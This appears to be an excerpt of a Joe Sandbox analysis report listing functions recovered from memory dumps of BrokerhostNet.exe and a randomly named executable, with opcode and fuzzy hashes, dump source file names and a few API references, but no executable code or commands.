Opcode ID: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction ID: c31a80f9cb361366575a429eeaec478daca8947e69b8cfefd9656cbf0b45c0a8
Opcode Fuzzy Hash: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction Fuzzy Hash: 8FC08C00F0F50F00E83037EF18220BCB2004BC4A28FD30132D00C821B19CCE22C6014E

Function 00007FFD9BAC0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction ID: fc6d7208f6bf27d9c99a80edb359d94204f5f6d34c0ef89302a4558f5ef523fc
Opcode Fuzzy Hash: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction Fuzzy Hash: 33C08C305118088FC900F72CC88491032A0FB0D210BC20090E00EC7170E25A9C81C700

Function 00007FFD9BAC64E2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction ID: f3096b5e1962a167101266a7c749055f447a4d6d507bf07500fa61bf0acf7dfe
Opcode Fuzzy Hash: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction Fuzzy Hash: 47D01271F0E55A82F93437D094711BE10909F20350F3B1076D91E1F2F25CEE6F025551

Function 00007FFD9BAC17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa1d1ff66167e9a210f711377414e9d0bbb3ba82358937f96213148618b0936
Instruction ID: ba32552e7f6e27e46755e744516c4e9f1d8a2a67a3d3793ba5a1cf94dfc8e70f
Opcode Fuzzy Hash: baa1d1ff66167e9a210f711377414e9d0bbb3ba82358937f96213148618b0936
Instruction Fuzzy Hash: 1EC04C01F1C82A06F25A7718443167D04429F54718F598174E11E873DECD6C6A0306CA

Function 00007FFD9BAC06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction ID: ee5495ea6a585f2d2bda2960299a2f3079b4c0ca6981180dae3476ee105f8f80
Opcode Fuzzy Hash: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction Fuzzy Hash: 9AB01210D5F40F00E83433FB0D5207870405B84104FC20170D40D8219198CE12950246

Function 00007FFD9BAE2820 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65fe1b534c0f0b6e26d026d5d40dbc2d3bc3e7cd0d725cd9cedb24ec66de3ce
Instruction ID: 3c1ec39b20862bbc28aa2c4c454748aca0750c1b86e435dca097ba26a9be691d
Opcode Fuzzy Hash: f65fe1b534c0f0b6e26d026d5d40dbc2d3bc3e7cd0d725cd9cedb24ec66de3ce
Instruction Fuzzy Hash: 6AA00214D9780F05DC1832FA5D970A474505B89114FC62565E90D81296E9CF16ED0293

Analysis Process: BrokerhostNet.exePID: 3164, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAB0D4C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD9BAB0DF3

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 78474107b97195cb1c584599f64e2ad2deda08df86f9ec9c3ec69437ce4c56f6
Instruction ID: c6330d78758540c0bfffeecc63a8b415e53447e48e31f7102f07f318e940585b
Opcode Fuzzy Hash: 78474107b97195cb1c584599f64e2ad2deda08df86f9ec9c3ec69437ce4c56f6
Instruction Fuzzy Hash: 05911471A19A9D4FE759DB6888797A87FE1FF59310F4101BED059CB2E2CAB81801C740

Function 00007FFD9BAB0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAB0B4E
"s9, xrefs: 00007FFD9BAB0B46
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 51509c9d83451400fbc9ed82dd62c755be72e1348561d4dd277382301598ebff
Instruction ID: cacdeb9d40c968a64aa5bb0bbf15484b4889db41d40da1b89d066c662b0099b5
Opcode Fuzzy Hash: 51509c9d83451400fbc9ed82dd62c755be72e1348561d4dd277382301598ebff
Instruction Fuzzy Hash: 9B012D2776E9658FC7116B7DF8501D8BB50EBC2176B8501FBC544C7162D214185FC7D0

Function 00007FFD9BAB08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7263ea2850fe098c3b840a89e3d810b1bff5b5bd0dc91914c72ab608d572c4a7
Instruction ID: a1f7d771ea6ca74a7018f15709bae903792a20f5bd464e2fa23fcea3dddcae70
Opcode Fuzzy Hash: 7263ea2850fe098c3b840a89e3d810b1bff5b5bd0dc91914c72ab608d572c4a7
Instruction Fuzzy Hash: 0431473130D8184FD768EB5CF88A9B977D0EF5532170505BBE48AC7176DD51AC828BC5

Function 00007FFD9BAB095D Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190d5a4058dc8b417cc7c9166297d4a212e97b8df82624efc70c3561e15bb8c4
Instruction ID: 971b05887643e809dc4686ba388b48032637a493d7fb03c437642f577d01e5f5
Opcode Fuzzy Hash: 190d5a4058dc8b417cc7c9166297d4a212e97b8df82624efc70c3561e15bb8c4
Instruction Fuzzy Hash: 8E313A21B0C96D1FE368B7ACA4666F873C1DF58336F1405BAE40EC71E7CD18AC418284

Function 00007FFD9BAB0960 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0126c1f4cec3aac9ce82a254da6abe8df73878353f5bd301d5195131a7295fdc
Instruction ID: 40a07af3d7642a4f8899f201d47f3f201a420eed2d1fb5ede7fc68b9a327d3ab
Opcode Fuzzy Hash: 0126c1f4cec3aac9ce82a254da6abe8df73878353f5bd301d5195131a7295fdc
Instruction Fuzzy Hash: D331FC21B0D95D1BE768B7AC64666F873C1DF58336F1405BAE41EC71E7CC18AC418285

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97168920377cc05cdcfea05f2d5d0eb0048af39ca09996702f6dce2a50ec02b1
Instruction ID: b78da3c7a44c26026296ea1eeb6b1695cda6949b570a4d379743be5a2a31bef8
Opcode Fuzzy Hash: 97168920377cc05cdcfea05f2d5d0eb0048af39ca09996702f6dce2a50ec02b1
Instruction Fuzzy Hash: D0213820B1D95E0FE798B76C847AA7933C2EF98321F5404B9E41EC32E7DC58AC428685

Function 00007FFD9BAB1171 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55acea7ef7954c1f5bfe42e4b1349289acdd3cebb655e3f25329cf310a551469
Instruction ID: 84d6b2dfe2861e12a38db4fdea36c59a46c52408405f5a09a67a469062eac82d
Opcode Fuzzy Hash: 55acea7ef7954c1f5bfe42e4b1349289acdd3cebb655e3f25329cf310a551469
Instruction Fuzzy Hash: BB31D730A0D65E8FDB59EBA8C8649A97BF0FF16310F0505FFC059C71A2DA78A941CB40

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee918b1156d6bd68381ab4f504fa934df55af103cc3aa43abae9eb69ec91977
Instruction ID: ae0587be416b6371a109c0a824348b45fd48a231b0b2dbce3027f4a18dfc92f8
Opcode Fuzzy Hash: 6ee918b1156d6bd68381ab4f504fa934df55af103cc3aa43abae9eb69ec91977
Instruction Fuzzy Hash: 2B210631A0D29D8FE732DBA988602EC7FA0EF42324F1645B7D054CB1E2D6782689CB45

Function 00007FFD9BAB1DD2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b23a5147b88d88c788590856d7c0d432fd4442c830eb25bbbf7cade49e0fea
Instruction ID: 22e8373e5395a721c3254c33601291c7824f635a1f4367cb5f013fad2f60c2ef
Opcode Fuzzy Hash: c3b23a5147b88d88c788590856d7c0d432fd4442c830eb25bbbf7cade49e0fea
Instruction Fuzzy Hash: 2F11D332B1D92D4EF7B4A758D8616F87392EF94320F5202B7C02EC31B2DD696A524A44

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2fcc44cccc71808e5471afdfa0cb05fb1fcef65c9a73ce1c92e08731bec9bf9
Instruction ID: 2bd4ea08ca2f59787d37643596392dcfab5b5dfac2cac399fa6f8fe0c91d7f84
Opcode Fuzzy Hash: f2fcc44cccc71808e5471afdfa0cb05fb1fcef65c9a73ce1c92e08731bec9bf9
Instruction Fuzzy Hash: 1511A032A0E79C8FE722DBA888602DD7FB0EF52311F1645B7C094DB1A2D67456098B85

Function 00007FFD9BAB57D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b021f45096cc54b44371b7af6381262890cd06aa3433908fbac84f55e4d8a67
Instruction ID: 530246d9ee212008498eaff8b720ccdd4417a348d45327c2925de9083360ff4f
Opcode Fuzzy Hash: 4b021f45096cc54b44371b7af6381262890cd06aa3433908fbac84f55e4d8a67
Instruction Fuzzy Hash: 4401DD11F1A83E4BFAB4E7A8407467C11C2EF54700F524175D42DC32F2EC6C6E434A44

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0414b6092ef5c497caabf59b9f50df185d6109d5e3a78df01993cd0033ca64b9
Instruction ID: 691948116ff081dcd3e632d5988fffd52114199f03b3cde0f02ecd8262ffce41
Opcode Fuzzy Hash: 0414b6092ef5c497caabf59b9f50df185d6109d5e3a78df01993cd0033ca64b9
Instruction Fuzzy Hash: 3401A131A0E78C8FE722DBA8C8602DD7FB0EF52310F1645E7D090DB1A2D6345648CB81

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bdb1f00415dab196feb60751fdba79d446700dd9a70c985bfbd9de06c31e56
Instruction ID: 2ede05c095c2c5840577e208273bd8b06fe78c1320973a5364deef82a7a009a8
Opcode Fuzzy Hash: 12bdb1f00415dab196feb60751fdba79d446700dd9a70c985bfbd9de06c31e56
Instruction Fuzzy Hash: 22015235A0E38C8FD722DB64C8501DD7FB0AF53314F1545E7D491DB1A2D6745644CB81

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d64e01a1ec4cf062f490fdcc73645d4cc1c864f3e9c0a1e078b0ddef110cf6e
Instruction ID: 01b515962da46f4d1f932201df4b53feae289fea292231e90f6439f2f5063899
Opcode Fuzzy Hash: 8d64e01a1ec4cf062f490fdcc73645d4cc1c864f3e9c0a1e078b0ddef110cf6e
Instruction Fuzzy Hash: D3018F31A0E38C8FE722DBA488602DD7FB0AF13314F1541E7D490DB2A2D6785A44CB41

Function 00007FFD9BAB1E30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction ID: ffa5add53716eefd051b5343db6548669f8398b1b1124cde2ac0994fe9afbd03
Opcode Fuzzy Hash: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction Fuzzy Hash: C9F01D31B1942E8AEB74AB94C8A4BF86361AB54310F1602B6C41ED31A1DEB86A918F44

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf68658bdb6913d29cb6de65edb2ee2e49120b5d329fe9b9a0880943a3175f8d
Instruction ID: 7d8f12b4f6f7589d790d00328ff0bf715ad41978c9391d9d9f254f948ec085d7
Opcode Fuzzy Hash: bf68658bdb6913d29cb6de65edb2ee2e49120b5d329fe9b9a0880943a3175f8d
Instruction Fuzzy Hash: 39F02B3525E654CFC701EB38DCA54D57FA0EF03114B8A11FEC489C7562C214585ECB40

Function 00007FFD9BAB6000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89edbda637d75056006ba80ef88b3adfdc45d703a00285922ff060651e32988c
Instruction ID: d186e5cfc6fafdd69bd870b09cc0f65539bc6f9571ed2e61046c0225a8c6435f
Opcode Fuzzy Hash: 89edbda637d75056006ba80ef88b3adfdc45d703a00285922ff060651e32988c
Instruction Fuzzy Hash: DEF04C34518E18CFCB59DF48C8A8A99B7F1FBA8305F110599D049E7360C731A944CF45

Function 00007FFD9BAB6FE4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction ID: 155e768dbe6f37826ab810dd43e4521b4b6de12523170bb8afb3b250117a56da
Opcode Fuzzy Hash: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction Fuzzy Hash: D8E01220F0D42A46FBB4A344D8A0BAD6261DB54310F1550B9E95EE33D1DD78AF858F05

Function 00007FFD9BAB06AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction ID: 99303b14d6a6b8269ba254bc5a236b81d663624c6ae05970579e8cdaa9895d8a
Opcode Fuzzy Hash: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction Fuzzy Hash: D9C08C00F0F63F04E43433EF18320ACB1009BC4A24FD30032D02C800B1ACCD22C6094E

Function 00007FFD9BAB0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction ID: 5e93523fdab68d25860efb1eedef1594e3f794f1fc204da979c7fd23636dfd7c
Opcode Fuzzy Hash: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction Fuzzy Hash: C6C08C305118088FC900E76CC88490032A0FB0D211BC200A0E00EC7170E25A9C81CB00

Function 00007FFD9BAB64E2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction ID: 9e02fe0fb546c3ac6ce201dd31546cdfacd67002f6288c668532579418cf8b81
Opcode Fuzzy Hash: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction Fuzzy Hash: 8CD0C972E1E57A81F93817D094715BE20909B20310F3A117AD93E5A1E25CAA6E025D61

Function 00007FFD9BAB17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ebd0d3eca71cb118192a7f9f1e757215a63420582152cb3c61e009ab8fe50e
Instruction ID: f3402cfff1235759c9fb651beea50d89749943cc229a99ce57a6df8e7329ca82
Opcode Fuzzy Hash: 48ebd0d3eca71cb118192a7f9f1e757215a63420582152cb3c61e009ab8fe50e
Instruction Fuzzy Hash: 04C04C01F2C82A0AF25E6714443167D08439F54718F558178E11EC63DECD6C6A0346CA

Function 00007FFD9BAB06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2299886005.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction ID: 2a31e77ed4cd1a1b2731129af3c9e51447874de4f80e002cc051bc4c21597f9d
Opcode Fuzzy Hash: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction Fuzzy Hash: C3B01210D5B41F04E43833FB0C520687040AB84104FC20070D41D8019198CD12950646

Analysis Process: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exePID: 5592, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	61.5%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAA0D4C Relevance: 1.5, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: a4e5b74a36f0e967e9e1014aacdb1a80b2a87d220e0da5d6f323a21a8c97385b
Instruction ID: bbe88415b9f228d036ec331c7046f24924efafb36fbce5e7e451885453686979
Opcode Fuzzy Hash: a4e5b74a36f0e967e9e1014aacdb1a80b2a87d220e0da5d6f323a21a8c97385b
Instruction Fuzzy Hash: 4A912472A19ACD4FE758DB6C88657A87FE1FF99310F0501BED049D72E2CBB858128700

Function 00007FFD9BE9C32A Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3087673938.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9be90000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50dcec8435344dae9ca76fd71e523d803f762d2eb5296cf83fcf50706101a048
Instruction ID: a36fecb9c7a1d4350fc4dd8c3dd2d114864df326f373f355f7ade8c19f10d3f7
Opcode Fuzzy Hash: 50dcec8435344dae9ca76fd71e523d803f762d2eb5296cf83fcf50706101a048
Instruction Fuzzy Hash: 8E22BE30A096498FDB6CDF68C4A46B87BA5FF59300F1045BED41EC7396CA39AA45CB40

Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c9, xrefs: 00007FFD9BAA0B56
"s9, xrefs: 00007FFD9BAA0B46
!k9, xrefs: 00007FFD9BAA0B4E

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: f7106222199fbe06ced611e382d8b1ee2b9e56728537cb41d8eaa247c40d6278
Instruction ID: 1be8df4a3b294309b913283da4dd96337c5c33cfd06e558f0966238506f49f18
Opcode Fuzzy Hash: f7106222199fbe06ced611e382d8b1ee2b9e56728537cb41d8eaa247c40d6278
Instruction Fuzzy Hash: BD01F42B76E95A8FC602AB3EF4505D87B50EBC2136B8605BBC544CB1A2E2141C9FC7E0

Function 00007FFD9BAE38B2 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9BAE7129

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9bad1000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 08d36ac2ad6e4287510cca02509ece4e751ee1bebeead8b74c767136ab2a274a
Instruction ID: 95d112ebdc3614fe6c8c88aa4a17f01c94bc2455f982cd2d0cc3c8a0ea90e580
Opcode Fuzzy Hash: 08d36ac2ad6e4287510cca02509ece4e751ee1bebeead8b74c767136ab2a274a
Instruction Fuzzy Hash: 93417F7191CB5C8FDB58EF4CD845AE97BE0FB69721F10426EE449E3251CB70A9418BC2

Function 00007FFD9BAE7207 Relevance: 1.6, APIs: 1, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FFD9BAE72D7

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9bad1000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: b1324af31367be1dd3ec4962068ac7107c623561d5d63a442416969ed7457fd7
Instruction ID: 78ae281d60a72572ee99655f2d43c808fcac7e395f0b6303e74575b70f7563c0
